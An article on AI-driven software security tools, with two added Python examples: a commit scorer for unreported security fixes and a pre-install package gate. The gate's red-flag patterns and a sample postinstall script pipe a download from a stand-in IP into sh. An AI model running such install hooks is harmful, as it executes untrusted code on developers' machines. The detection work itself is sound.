How AI Is Transforming Software Security in 2025
These days, AI is changing how we keep software safe. At big security shows like Black Hat USA 2025 and DEF CON 33, experts talked about AI not just as a trend, but as the backbone of modern security tools. Companies are now using AI at every step in the software development process, from finding vulnerabilities to making code safer and faster.
AI is helping developers identify problems early. Some startups are using large language models to spot “shadow-patched” vulnerabilities. These are bugs in open-source code that don’t get official reports or CVEs but can still put apps at risk. Mackenzie Jackson from Aikido Software explains that AI can scan commit histories to find suspicious changes that look like security fixes—so organizations can catch issues that traditional tools might miss.
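To make the "scan commit histories for changes that look like security fixes" idea concrete, here is an added example; it is not Aikido's code and does not reflect how their product works. It scores each commit on cues that usually accompany a security fix (vulnerability vocabulary in the message, a bounds check or output escaping added in the diff, an unbounded C call removed) and flags commits that score like a fix yet cite no CVE or advisory. The cue weights, the threshold, the sample commits and the placeholder CVE id are all constructed for illustration.

```python
"""Heuristic triage of a commit history for undisclosed ("shadow") security fixes.

Added example, not Aikido's code. Scores each commit on cues that usually
accompany a security fix and flags commits that look like fixes but cite no
CVE or advisory. Weights, threshold and sample commits are constructed.
"""
import re
from dataclasses import dataclass

# A fix that cites one of these is already public; it is not a shadow patch.
DISCLOSURE_RE = re.compile(
    r"\b(CVE-\d{4}-\d{4,}|GHSA-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{4}|security advisory)\b", re.I
)

# (pattern, weight) pairs tested against the commit message.
MESSAGE_CUES = [
    (re.compile(r"\b(overflow|out[- ]of[- ]bounds|use[- ]after[- ]free|double[- ]free)\b", re.I), 3),
    (re.compile(r"\b(injection|xss|csrf|ssrf|path traversal)\b", re.I), 3),
    (re.compile(r"\b(sanitiz|escap|validat)\w*", re.I), 2),
    (re.compile(r"\b(bounds?|length|null) check", re.I), 2),
    (re.compile(r"\b(crash|segfault|panic|hang)", re.I), 1),
]
# (pattern, weight) pairs tested line by line against the unified diff.
DIFF_CUES = [
    (re.compile(r"^-.*\b(strcpy|strcat|sprintf|gets)\s*\("), 3),              # unbounded C call removed
    (re.compile(r"^\+.*\b(strncpy|strncat|snprintf|strlcpy)\s*\("), 2),       # bounded replacement added
    (re.compile(r"^\+.*\bif\s*\(.*(len|length|size|count)\w*\s*[<>]=?"), 2),  # new size comparison
    (re.compile(r"^\+.*\b(escape|sanitize|quote)\w*\s*\("), 2),              # new output escaping
    (re.compile(r"^\+.*\bsizeof\b"), 1),                                      # buffer size now consulted
]
SHADOW_THRESHOLD = 5  # constructed cut-off; tune against labelled history in practice


@dataclass(frozen=True)
class Commit:
    sha: str
    message: str
    diff: str


def fix_score(commit: Commit) -> int:
    """Sum cue weights; each cue counts at most once per commit so long diffs do not dominate."""
    score = sum(w for pat, w in MESSAGE_CUES if pat.search(commit.message))
    lines = commit.diff.splitlines()
    score += sum(w for pat, w in DIFF_CUES if any(pat.search(line) for line in lines))
    return score


def classify(commit: Commit) -> tuple[str, int]:
    """Return (label, score): 'disclosed_fix', 'shadow_fix_candidate' or 'other'."""
    score = fix_score(commit)
    if DISCLOSURE_RE.search(commit.message):
        return "disclosed_fix", score
    if score >= SHADOW_THRESHOLD:
        return "shadow_fix_candidate", score
    return "other", score


def triage(commits) -> dict[str, tuple[str, int]]:
    """Classify every commit; the candidates are what a human (or an LLM) reviews next."""
    return {c.sha: classify(c) for c in commits}


# Constructed commit records; the CVE id below is an obvious placeholder, not a real entry.
SAMPLE_COMMITS = [
    Commit("a1", "Fix crash when parsing long header values",
           "-    strcpy(buf, hdr);\n"
           "+    if (hdrlen >= sizeof buf) return -1;\n"
           "+    strncpy(buf, hdr, sizeof buf - 1);\n"),
    Commit("b2", "Fix heap overflow in chunk length handling (CVE-0000-0000, placeholder id)",
           "+    if (chunk_len > remaining) return PARSE_ERR;\n"
           "     memcpy(dst, src, chunk_len);\n"),
    Commit("c3", "Update README badges and CI matrix",
           "+[![build](https://example.invalid/badge.svg)](https://example.invalid/ci)\n"),
    Commit("d4", "Escape display name before rendering the profile page (fixes stored XSS)",
           '-    return f"<h1>{name}</h1>"\n'
           '+    return f"<h1>{html.escape(name)}</h1>"\n'),
]

if __name__ == "__main__":
    for sha, (label, score) in triage(SAMPLE_COMMITS).items():
        print(f"{sha}  score={score:<2}  {label}")
```

Running it labels a1 and d4 as shadow-fix candidates, b2 as a disclosed fix and c3 as noise. The point of the two-stage design is that the cheap regex pass narrows millions of commits to a short list, which is where a language model or an analyst can afford to read the actual diff.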
Making Open-Source Code Safer with AI
Open-source software is everywhere, but not all vulnerabilities are tracked properly. Aikido Security uses AI to monitor millions of open-source projects daily. They look for hidden threats like malicious code, credential stealers, or obfuscated malware. Since launching in 2024, they’ve found over 500 previously unknown vulnerabilities, many of which never received official CVEs. Relying only on standard vulnerability feeds can therefore leave gaps in a project’s security coverage.
To make it easier for developers, Aikido created Safe Chain. It’s a tool that wraps around common package managers like npm, yarn, and pnpm. Safe Chain automatically checks each package before it’s installed, warning developers if something looks suspicious. This helps keep dangerous code out of apps without slowing down the development process. It’s a smart way to add security right into daily coding habits.
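The following is an added example of what a pre-install check of this kind can look like; it is not Safe Chain's code and does not describe how that tool decides. Instead of hooking a real package manager, it takes the metadata a wrapper would have in hand before running `install` (name, lifecycle scripts, publication age) and returns allow, warn or block together with the reasons. The reference list of well-known names, the red-flag patterns, the age threshold and all sample packages are constructed.

```python
"""Pre-install gate for third-party packages, in the spirit of wrapping npm/yarn/pnpm.

Added example, not Safe Chain's code. Takes package metadata a wrapper would
see before `install` and returns allow / warn / block with findings. The
well-known-name list, red-flag patterns, thresholds and samples are constructed.
"""
import re
from difflib import SequenceMatcher
from typing import Optional

# Constructed stand-in for a list of popular package names, used for look-alike detection.
WELL_KNOWN_NAMES = {"express", "lodash", "react", "axios", "chalk"}
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
FRESH_PACKAGE_DAYS = 2  # constructed: anything newer gets a warning
RANK = {"allow": 0, "warn": 1, "block": 2}

# Lifecycle-script behaviours that should never pass unreviewed. Illustrative list.
SCRIPT_RED_FLAGS = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash|node)\b"), "pipes a download into an interpreter"),
    (re.compile(r"\b(base64|atob)\b"), "decodes base64 at install time"),
    (re.compile(r"\beval\s*\("), "calls eval()"),
    (re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}"), "contacts a raw IP address"),
    (re.compile(r"\.(ssh|npmrc|aws)\b|\bid_rsa\b"), "touches credential files"),
]


def escalate(current: str, new: str) -> str:
    """Keep the more severe of two decisions."""
    return max(current, new, key=RANK.get)


def looks_like_typosquat(name: str) -> Optional[str]:
    """Return the well-known name this one closely resembles (but is not), else None."""
    if name in WELL_KNOWN_NAMES:
        return None
    for known in sorted(WELL_KNOWN_NAMES):
        close_length = abs(len(name) - len(known)) <= 1
        if close_length and SequenceMatcher(None, name, known).ratio() >= 0.85:
            return known
    return None


def check_package(meta: dict) -> tuple[str, list[str]]:
    """Decide 'allow', 'warn' or 'block' for one package and list the findings."""
    findings: list[str] = []
    decision = "allow"

    # Lifecycle scripts run with the developer's privileges at install time.
    for hook in LIFECYCLE_HOOKS:
        script = meta.get("scripts", {}).get(hook)
        if not script:
            continue
        for pattern, why in SCRIPT_RED_FLAGS:
            if pattern.search(script):
                findings.append(f"{hook} script {why}")
                decision = escalate(decision, "block")

    lookalike = looks_like_typosquat(meta["name"])
    if lookalike:
        findings.append(f"name resembles well-known package '{lookalike}'")
        decision = escalate(decision, "warn")

    age = meta.get("published_days_ago")
    if age is not None and age < FRESH_PACKAGE_DAYS:
        findings.append(f"version published {age} day(s) ago")
        decision = escalate(decision, "warn")

    return decision, findings


def gate_install(packages) -> dict[str, str]:
    """Map package name to its decision; a wrapper would abort the install on any 'block'."""
    return {p["name"]: check_package(p)[0] for p in packages}


# Constructed sample manifests; 203.0.113.0/24 is the documentation range, not a real host.
SAMPLE_PACKAGES = [
    {"name": "lodash", "version": "0.0.0-example", "scripts": {}, "published_days_ago": 900},
    {"name": "expresss", "version": "0.0.1", "scripts": {}, "published_days_ago": 1},
    {"name": "colr-utils", "version": "1.0.0",
     "scripts": {"postinstall": "curl -s http://203.0.113.5/setup.sh | sh"},
     "published_days_ago": 3},
    {"name": "my-build-tool", "version": "2.4.0",
     "scripts": {"postinstall": "node scripts/compile.js"},
     "published_days_ago": 400},
]

if __name__ == "__main__":
    for pkg in SAMPLE_PACKAGES:
        decision, findings = check_package(pkg)
        print(f"{pkg['name']:<14} {decision:<6} {'; '.join(findings)}")
```

The build tool with a harmless `postinstall` passes, which matters: a gate that flags every lifecycle script gets disabled by developers within a week. Warnings (look-alike name, very new release) leave the choice to the developer, while a script that pipes a download into a shell is blocked outright and needs an explicit override.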
Building Trust with Secure, Minimal Software
Chainguard offers a different approach. Founded by former Google engineers, they make secure, minimal software packages that are built directly from upstream sources. Their goal is to create “zero-CVE” images, meaning they don’t have known vulnerabilities when used. They update and rebuild these images quickly—usually within 48 hours when a new security issue appears.
Chainguard’s method involves creating base operating system images, libraries, and virtual machines that are stripped down and verified. This way, developers can start with a clean, trustworthy foundation. Their container images and VM appliances are designed for cloud and Kubernetes environments, providing a solid security baseline from the start. This “farm-to-table” process ensures vulnerabilities are caught early, often before deployment.
Embedding Security into Developer Workflows
Checkmarx is another big name making waves. They introduced new AI tools that give developers real-time security advice while coding. For example, Checkmarx One Developer Assist integrates into popular IDEs and helps spot vulnerabilities as code is written. This means fixing issues early, rather than after the code is finished.
They also previewed upcoming AI agents that work in CI/CD pipelines. Policy Assist will find and fix vulnerabilities during the build process, while Insights Assist will provide ongoing risk reports. Checkmarx’s platform combines various testing methods—like static analysis, software composition analysis, and API security—to give a comprehensive security picture. This makes it easier for teams to build safer software from day one.
All these efforts show a clear trend: security isn’t just about catching problems anymore. It’s about preventing them, fixing them quickly, and integrating safety checks smoothly into everyday workflows. AI is making this possible, helping developers keep pace with the fast-moving world of software creation while staying secure.
As these companies and tools continue to evolve, it’s clear that AI will play a vital role in shaping the future of application security. The goal is simple: make security faster, more accurate, and less disruptive—so that protecting software becomes a natural part of the development process.